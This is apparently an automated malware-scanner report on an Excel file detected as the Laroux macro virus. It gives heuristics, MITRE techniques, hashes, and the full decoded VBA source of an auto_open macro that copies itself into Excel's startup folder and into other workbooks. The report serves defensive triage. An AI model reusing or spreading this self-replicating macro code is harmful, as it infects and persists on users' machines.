Verdict: MALICIOUS
Risk Score: 300

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The file is identified as malicious by ClamAV with the signature Xls.Trojan.Laroux-21. It contains an Auto_Open VBA macro that executes automatically upon opening the Excel file. This macro attempts to save the workbook as 'jokefile.xls' in the startup path and re-registers itself to run again, indicating a persistence mechanism.
Heuristics (6)

- ClamAV: Xls.Trojan.Laroux-21 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Laroux-21.
- Embedded Office document has suspicious static findings (critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE): A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 19,130 bytes but its declared streams total only 0 bytes; 19,130 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code.
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro.
- CFB header with no readable streams (medium, OLE_PARSE_EMPTY_STREAMS): The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous: it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3196 bytes |
| embedded_office_off00006746.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x6746 | 19130 bytes |

macros.bas

- SHA-256: 845bb9d88b030998270ce8f23e169c3462bdc6a3ae48ef767c16e18d69b7c2f2
- Detection: ClamAV: Xls.Trojan.Laroux-21
- Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "jokefile"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "joke"
End Sub
Sub joke()
Attribute joke.VB_ProcData.VB_Invoke_Func = " \n14"
C$ = Application.StartupPath
m$ = Dir(C$ & "\" & "jokefile.xls")
If m$ = "jokefile.xls" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
n4$ = ActiveWorkbook.Name
' Sheets("jokefile").Visible = True
Sheets("jokefile").Select
newname$ = ActiveWorkbook.Name
c4$ = CurDir()
ChDir Application.StartupPath
'ActiveWindow.Visible = False
Workbooks(newname$).SaveAs filename:=Application.StartupPath & "\" & "jokefile.xls", FileFormat:=xlNormal
ChDir c4$
Application.OnSheetActivate = ""
Application.OnSheetActivate = "jokefile!joke"
Case 1
'application.
n4$ = ActiveWorkbook.Name
p4$ = ActiveWorkbook.Path
s$ = Workbooks(n4$).Sheets(1).Name
If s$ <> "jokefile" Then
Workbooks("jokefile.xls").Sheets("jokefile").Copy before:=Workbooks(n4$).Sheets(1)
Else
End If
Application.OnSheetActivate = ""
Application.OnSheetActivate = "jokefile.xls!joke"
Case Else
End Select
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```

embedded_office_off00006746.ole

- SHA-256: 60772d850187a91ea816d6910df03c9f226b1b3dbd71d29bdd1ba065da1e3310